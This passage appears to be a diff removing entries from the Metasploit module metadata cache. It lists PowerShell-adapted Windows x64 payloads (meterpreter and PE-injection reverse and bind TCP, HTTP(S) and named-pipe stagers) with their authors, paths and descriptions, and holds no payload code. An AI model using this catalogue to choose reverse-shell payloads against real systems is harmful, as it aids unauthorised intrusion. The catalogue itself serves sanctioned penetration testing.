- "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/powershell/x64/encrypted_shell/reverse_tcp": { - "name": "Powershell Exec, Windows Command Shell, Encrypted Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/encrypted_shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Matt Graeber", - "Shelby Pace" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/encrypted_shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/encrypted_shell/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/encrypted_shell", - "stager_refname": "windows/x64/encrypted_reverse_tcp" - }, - "payload_cmd/windows/powershell/x64/exec": { - "name": "Powershell Exec, Windows x64 Execute Command", - "fullname": "payload/cmd/windows/powershell/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nExecute an arbitrary command (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/exec", - "staged": false - }, - "payload_cmd/windows/powershell/x64/loadlibrary": { - "name": "Powershell Exec, Windows x64 LoadLibrary Path", - "fullname": "payload/cmd/windows/powershell/x64/loadlibrary", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "scriptjunkie", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nLoad an arbitrary x64 library path", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/loadlibrary", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/loadlibrary", - "staged": false - }, - "payload_cmd/windows/powershell/x64/messagebox": { - "name": "Powershell Exec, Windows MessageBox x64", - "fullname": "payload/cmd/windows/powershell/x64/messagebox", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "pasta " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a dialog via MessageBox using a customizable title, text & icon", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/messagebox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/messagebox", - "staged": false - }, - "payload_cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp": { - "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/meterpreter/bind_named_pipe": { - "name": "Powershell Exec, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "UserExistsError" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/powershell/x64/meterpreter/bind_tcp": { - "name": "Powershell Exec, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4": { - "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid": { - "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/meterpreter/reverse_http": { - "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_http", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/powershell/x64/meterpreter/reverse_https": { - "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "agix", - "rwincey" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_https", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/powershell/x64/meterpreter/reverse_named_pipe": { - "name": "Powershell Exec, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/powershell/x64/meterpreter/reverse_tcp": { - "name": "Powershell Exec, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid": { - "name": "Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/meterpreter/reverse_winhttp": { - "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/powershell/x64/meterpreter/reverse_winhttps": { - "name": "Powershell Exec, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/powershell/x64/peinject/bind_ipv6_tcp": { - "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/peinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/peinject/bind_named_pipe": { - "name": "Powershell Exec, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "UserExistsError" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/peinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/peinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/powershell/x64/peinject/bind_tcp": { - "name": "Powershell Exec, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/powershell/x64/peinject/bind_tcp_rc4": { - "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/x64/peinject/bind_tcp_uuid": { - "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - 